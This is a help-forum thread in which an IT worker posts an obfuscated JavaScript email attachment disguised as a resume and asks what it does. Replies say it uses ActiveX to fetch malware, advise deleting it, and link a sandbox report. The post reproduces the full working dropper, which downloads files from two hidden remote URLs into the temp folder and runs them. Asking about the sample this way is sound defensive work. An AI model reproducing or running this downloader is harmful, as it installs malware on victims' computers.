Malicious javascript pretending to be a resume: What does this script do?

Hi guys,

I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn

Open in new window

My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew
defectaAsked:
Who is Participating?
 
Dave BaldwinFixer of ProblemsCommented:
It appears to be attempting to load an ActiveX component which, depending on your Windows security, can potentially do just about anything.  The most likely thing is loading viruses and malware off the internet to infect the machine that it is run on.
0
 
JohnBusiness Consultant (Owner)Commented:
I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.
0
 
defectaAuthor Commented:
I appreciate that, and I do too but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.

I would really appreciate some insight into what the purpose of this script is and what it's trying to do.

I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?

Cheers.
0
Ultimate Tool Kit for Technology Solution Provider

Broken down into practical pointers and step-by-step instructions, the IT Service Excellence Tool Kit delivers expert advice for technology solution providers. Get your free copy now.

 
defectaAuthor Commented:
Thanks Dave.

Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
0
 
Dave BaldwinFixer of ProblemsCommented:
I don't know.  I saw this part...
var GkqB = new ActiveXObject(

Open in new window

which declares a new ActiveXObject but since most of the javascript is encoded (and I won't run it to decode it), I can't tell where it is going to get it.

I just noticed another ActiveXObject in the first line of the script.
0
 
Scott Fell, EE MVEDeveloper & EE ModeratorCommented:
I uploaded the file to malwr.com to check out  https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.